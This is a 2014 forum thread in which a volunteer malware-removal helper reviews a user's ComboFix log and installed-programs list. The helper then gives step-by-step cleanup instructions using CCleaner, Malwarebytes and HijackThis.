[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\VersionIndependentProgID]
@="ShockwaveFlash.ShockwaveFlash"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}]
@Denied: (A 2) (Everyone)
@="Macromedia Flash Factory Object"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\InprocServer32]
@="c:\\Windows\\SysWow64\\Macromed\\Flash\\Flash10c.ocx"
"ThreadingModel"="Apartment"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\ProgID]
@="FlashFactory.FlashFactory.1"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\ToolboxBitmap32]
@="c:\\Windows\\SysWow64\\Macromed\\Flash\\Flash10c.ocx, 1"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\TypeLib]
@="{D27CDB6B-AE6D-11cf-96B8-444553540000}"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\Version]
@="1.0"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\VersionIndependentProgID]
@="FlashFactory.FlashFactory"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{1D4C8A81-B7AC-460A-8C23-98713C41D6B3}]
@Denied: (A 2) (Everyone)
@="IFlashBroker3"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{1D4C8A81-B7AC-460A-8C23-98713C41D6B3}\ProxyStubClsid32]
@="{00020424-0000-0000-C000-000000000046}"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{1D4C8A81-B7AC-460A-8C23-98713C41D6B3}\TypeLib]
@="{FAB3E735-69C7-453B-A446-B6823C6DF1C9}"
"Version"="1.0"
.
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\PCW\Security]
@Denied: (Full) (Everyone)
.
Completion time: 2014-03-26 16:27:35
ComboFix-quarantined-files.txt 2014-03-26 06:27
ComboFix2.txt 2014-03-24 23:14
.
Pre-Run: 652,774,146,048 bytes free
Post-Run: 652,473,430,016 bytes free
.
- - End Of File - - E6BDD3DB76006ADF905C37575C28EB50
B408478238977884445221DD3C0F0326

#13 gringo_pr

gringo_pr

    Bleepin Gringo


  • Malware Response Team
  • 136,772 posts
  • Gender:Male
  • Location:Puerto rico
  • Local time:03:21 PM

Posted 27 March 2014 - 10:09 AM


Hello Paulie67

I would like to see a report that combofix makes.

extra combofix report
  • push the "windows key" + "R" (between the "Ctrl" button and "Alt" Button)
  • please copy and paste the following into the box
C:\Qoobox\Add-Remove Programs.txt
  • click ok
copy and paste the report into this topic for me to review

Gringo
I Close My Topics If You Have Not Replied In 5 Days If You Will Be Longer Please Let Me Know

If I Have Not Replied To One Of My Topics In 48 Hrs Please Bump The Topic



My help is free, however, if you wish to make a small donation to show your appreciation or to help me continue the fight against Malware, then click here. Don't worry, every little bit helps.

Proud Graduate Of Malware Removal University

#14 Paulie67

Paulie67
  • Topic Starter

  • Members
  • 12 posts
  • Gender:Female
  • Location:Sunshine Coast, QLD
  • Local time:05:21 AM

Posted 27 March 2014 - 03:27 PM

ABBYY FineReader 9.0 Sprint
Activation Assistant for the 2007 Microsoft Office suites
ActiveCheck component for HP Active Support Library
Adobe AIR
Adobe Flash Player 10 ActiveX
Adobe Flash Player 12 Plugin
Adobe Reader XI (11.0.06)
Adobe Shockwave Player 12.0
Apple Application Support
Apple Software Update
avast! Premier
AVG PC TuneUp 2014
AVG PC TuneUp 2014 (en-US)
Bing Bar
Catalyst Control Center - Branding
Catalyst Control Center Core Implementation
Catalyst Control Center Graphics Full Existing
Catalyst Control Center Graphics Full New
Catalyst Control Center Graphics Light
Catalyst Control Center Graphics Previews Common
Catalyst Control Center Graphics Previews Vista
Catalyst Control Center HydraVision Full
Catalyst Control Center InstallProxy
Catalyst Control Center Localization All
ccc-core-static
CCC Help Chinese Standard
CCC Help Chinese Traditional
CCC Help Czech
CCC Help Danish
CCC Help Dutch
CCC Help English
CCC Help Finnish
CCC Help French
CCC Help German
CCC Help Greek
CCC Help Hungarian
CCC Help Italian
CCC Help Japanese
CCC Help Korean
CCC Help Norwegian
CCC Help Polish
CCC Help Portuguese
CCC Help Russian
CCC Help Spanish
CCC Help Swedish
CCC Help Thai
CCC Help Turkish
Compatibility Pack for the 2007 Office system
CyberLink DVD Suite Deluxe
D3DX10
DirectX for Managed Code Update (Summer 2004)
Epson Easy Photo Print 2
Epson Easy Photo Print Plug-in for PMB(Picture Motion Browser)
Epson Event Manager
EPSON Scan
EPSON TX420 NX420 Series Manual
EPSON TX420 NX420 Series Network Guide
EpsonNet Print
EpsonNet Setup 3.2
HP Advisor
HP Customer Experience Enhancements
HP Games
HP Odometer
HP Setup
HP Support Assistant
HP Support Information
HP Update
HPAsset component for HP Active Support Library
HydraVision
Junk Mail filter update
LabelPrint
LightScribe System Software
Malwarebytes Anti-Malware version 1.75.0.1300
Microsoft Office 2010
Microsoft Office Click-to-Run 2010
Microsoft Office PowerPoint Viewer 2007 (English)
Microsoft Office Starter 2010 - English
Microsoft SQL Server 2005 Compact Edition [ENU]
Microsoft Visual C++ 2005 Redistributable
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161
Microsoft Works
Mozilla Firefox 27.0.1 (x86 en-US)
Mozilla Thunderbird 24.2.0 (x86 en-US)
MSVCRT
MSVCRT_amd64
Power2Go
PowerDirector
Realtek High Definition Audio Driver
Recovery Manager
Security Update for Microsoft .NET Framework 4.5.1 (KB2898869)
Security Update for Microsoft .NET Framework 4.5.1 (KB2901126)
swMSM
Visual Studio 2012 x86 Redistributables
Windows Live Communications Platform
Windows Live Essentials
Windows Live Installer
Windows Live Mail
Windows Live Messenger
Windows Live Movie Maker
Windows Live Photo Common
Windows Live Photo Gallery
Windows Live PIMT Platform
Windows Live SOXE
Windows Live SOXE Definitions
Windows Live Sync
Windows Live UX Platform
Windows Live UX Platform Language Pack
Windows Live Writer
Windows Live Writer Resources
 



#15 gringo_pr

gringo_pr

    Bleepin Gringo


  • Malware Response Team
  • 136,772 posts
  • Gender:Male
  • Location:Puerto rico
  • Local time:03:21 PM

Posted 29 March 2014 - 08:31 AM


Hello

These logs are looking a lot better. But we still have some work to do.

Please print out these instructions, or copy them to a Notepad file. It will make it easier for you to follow the instructions and complete all of the necessary steps.

Clean Out Temp Files
  • This small application you may want to keep and use once a week to keep the computer clean.

    Download CCleaner from here CCleaner
    • Run the installer to install the application.
    • When it gives you the option to install Yahoo toolbar uncheck the box next to it.
    • Run CCleaner. Default settings are fine.
    • Click Run Cleaner.
    • Close CCleaner.
: Malwarebytes' Anti-Malware :

I see that you have MBAM installed - That is great! At this time I would like you to update it and run me a quick scan.
  • Double-click mbam icon
  • go to the update tab at the top
  • click on check for updates
  • If an update is found, it will download and install the latest version.
  • Once the program has loaded, select Perform quick scan, then click Scan.
  • When the scan is complete, click OK, then Show Results to view the results.
  • Be sure that everything is Checked (ticked) except items in the C:\System Volume Information folder and click on Remove Selected.
  • When completed, a log will open in Notepad. Please copy and paste the log into your next reply.
    • If you accidentally close it, the log file is saved here and will be named like this:
    • C:\Documents and Settings\Username\Application Data\Malwarebytes\Malwarebytes' Anti-Malware\Logs\mbam-log-date (time).txt
Note: If MBAM encounters a file that is difficult to remove, you will be presented with 1 of 2 prompts.
Click OK to either and let MBAM proceed with the disinfection process.
If asked to restart the computer, please do so immediately. Failure to reboot will prevent MBAM from removing all the malware.



Download HijackThis
  • Go Here to download HijackThis program
  • Save HijackThis to your desktop.
  • Right Click on Hijackthis and select "Run as Admin" (XP users just need to double click to run)
  • Click on "Do A system scan and save a logfile" (if you do not see "Do A system scan and save a logfile" then click on main menu)
  • Copy and paste the HijackThis report into the topic
"information and logs"
  • In your next post I need the following
    • Log From MBAM
    • report from Hijackthis
    • let me know of any problems you may have had
    • How is the computer doing now?
Gringo



